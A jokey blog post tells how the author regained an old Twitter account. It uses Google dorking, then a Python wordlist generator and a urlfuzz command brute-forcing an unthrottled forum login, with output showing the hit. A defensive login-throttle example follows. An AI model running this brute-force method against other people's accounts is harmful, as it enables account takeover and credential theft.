Go Hack Yourself

Bam Bam Bam, Hacked!

We’ve all, at one point in our lives, wanted to get rid of an old online account that we forgot the password to. Whatever the reason may be, most of the time it seems impossible to ever log back in, but not for a hacker…

Me hacking the FBI

Yeah yeah yeah, we get it. You hack. So why don’t you delete that old Twitter account where you tweeted cringey shit and didn’t disable YouTube’s activity sharing? Now everyone knows you watch Jake Paul.

Real Tweet BTW

Well, the truth is….I can’t. There are 3 methods to hack a social media account:

  1. Phishing/Social Engineering
  2. 0days
  3. Misc (Cracking Hashes, Keylogging, Physical Access, OSINT, Etc.)

It really varies for everyone’s situation. Remember, hacking a social media account is all about getting the password, nothing else. Even if it requires breaking into a government-owned building, knocking out 20 security guards, getting physical access to your victim’s machine, and stealing that juicy password hash, just to spend 1 week trying to crack it. Come to think of it, you could have just installed a keylogger…

REEEEEE

Do you see where I’m going with this? The possibilities are endless. Social engineering plays a huge part, but it’s really not a factor when you’re hacking….yourself. In fact, this is where things get more interesting. I gave up on deleting my old Twitter account from middle school ages ago, but recently I took it as a challenge to hack back into that sucker.

Here I come Twitter!

Scavenging/Brainstorming

The number one rule when trying to get back into an old account is scavenging for old passwords. I noted all of my old passwords down in a text file and then attempted them on my Twitter account. None of them worked, obviously. So the next thing I tried was Google Dorking for old accounts I used to own under this alias. Let’s just say I went by the name bobbyjoe93 for my sake and privacy.

I quickly discovered multiple forum accounts, but most importantly an old YouTube channel. Horrible videos I made in middle school had been public for all this time, and I didn’t even bother to take them down?

Bruh Momentum

This was the same Google account linked to my Twitter, so:

Pwn Google = Pwn Twitter

Attempting all of my old passwords on Google didn’t seem to work either, but I did get something interesting:

Damn, that was a long time ago...

Like a soldier suffering from PTSD, when I saw this message, my brain clicked and I remembered something very important. When I was in middle school, I changed all of my accounts under this alias to use the password I had already been using, but I appended 4 digits to it. I guess little me thought that adding 4 digits would make me unhackable. The only issue is, I don’t remember what the 4 digits were, I just remember adding 4 digits. Brute forcing the numbers would be impossible on Google or Twitter, so I basically gave up at this point.

Okay

But then…….

Shitty Minecraft Forums FTW

Lets goooooo!

To keep things short, I found an account registered on some Minecraft forum I used to use that had no rate limiting on the login…

Pwn Forum = Pwn Google = Pwn Twitter

It’s simple: make a shitty script that generates a shitty wordlist of shitty passwords, and brute force the fuck out of the shitty site.

import itertools

# Write the known base password plus every 4-digit suffix (0000-9999) to wordlist.txt
with open('wordlist.txt', 'w') as myfile:
    for i in itertools.product(range(10), repeat=4):
        myfile.write("shittypassword" + "%s\n" % ''.join(map(str, i)))

Now we run this bad boy:

frinto@pwnie:/tmp/brute-force$ python3 pass-gen.py 
frinto@pwnie:/tmp/brute-force$ wc -l wordlist.txt 
10000 wordlist.txt
frinto@pwnie:/tmp/brute-force$ cat wordlist.txt 
shittypassword0000
shittypassword0001
shittypassword0002
shittypassword0003
shittypassword0004

I’ll be using URLFuzz to brute force the login form, but you can use any tool of your liking. Heck, you can even make another shitty script for that too!

frinto@pwnie:~$ urlfuzz https://example.com/login -d 'username=bobbyjoe93&password=#FUZZ#' -w /tmp/brute-force/wordlist.txt --hc=404,401

  ██╗   ██╗██████╗ ██╗     ███████╗██╗   ██╗███████╗███████╗ 
  ██║   ██║██╔══██╗██║     ██╔════╝██║   ██║╚══███╔╝╚══███╔╝ 
  ██║   ██║██████╔╝██║     █████╗  ██║   ██║  ███╔╝   ███╔╝  
  ██║   ██║██╔══██╗██║     ██╔══╝  ██║   ██║ ███╔╝   ███╔╝   
  ╚██████╔╝██║  ██║███████╗██║     ╚██████╔╝███████╗███████╗ 
   ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝      ╚═════╝ ╚══════╝╚══════╝ 

Version: 0.0.0

================================================================================

 Fuzz URL    : https://example.com/login
 POST data   : username=bobbyjoe93&password=#FUZZ#
 Filtered    : C=404,401
 Fuzz type   : Wordlist
 Server      : EOS (vny006/044E)
 Resp. codes : 200 OK 204 Empty 301 Moved 401 Unauth. 404 NotFound 500 SrvError 
 
 = CODE ======== LINES ======== WORDS == VALUE ====================================
   200             13             29    shittypassword3782

2 fucking EZ…
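
The flip side for whoever runs the forum, as an added example that is not part of the original post: a per-account failed-login throttle replayed against the same 10,000-candidate run at one request per second. `LoginThrottle`, `replay`, the 5-failures-per-15-minutes policy and the `oldpassword` base word are assumptions made for the illustration.

```python
from collections import defaultdict, deque

class LoginThrottle:
    """Per-username cap on failed logins inside a sliding time window."""

    def __init__(self, max_failures=5, window_s=900):
        self.max_failures = max_failures
        self.window_s = window_s
        self._failures = defaultdict(deque)  # username -> failure timestamps

    def _recent(self, username, now):
        q = self._failures[username]
        while q and now - q[0] >= self.window_s:  # drop failures outside the window
            q.popleft()
        return q

    def allowed(self, username, now):
        return len(self._recent(username, now)) < self.max_failures

    def record_failure(self, username, now):
        self._recent(username, now).append(now)

    def record_success(self, username):
        self._failures.pop(username, None)


def replay(throttle, username, candidates, real_password):
    """Replay one login attempt per second; return (checked, rejected, found)."""
    checked = rejected = 0
    for now, guess in enumerate(candidates):  # constructed clock: 1 request/second
        if not throttle.allowed(username, now):
            rejected += 1  # refused before the password is even compared
            continue
        checked += 1
        if guess == real_password:
            throttle.record_success(username)
            return checked, rejected, True
        throttle.record_failure(username, now)
    return checked, rejected, False


# Constructed sample: same shape as the wordlist above (base word + 4 digits).
CANDIDATES = [f"oldpassword{n:04d}" for n in range(10_000)]
REAL = "oldpassword3782"

if __name__ == "__main__":
    print(replay(LoginThrottle(max_failures=10**9), "bobbyjoe93", CANDIDATES, REAL))
    print(replay(LoginThrottle(), "bobbyjoe93", CANDIDATES, REAL))
```

With the throttle in place only 60 of the 10,000 requests ever reach the password check, and the request carrying the correct password is refused along with the rest.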

Me and Da Boys

Written on August 31, 2019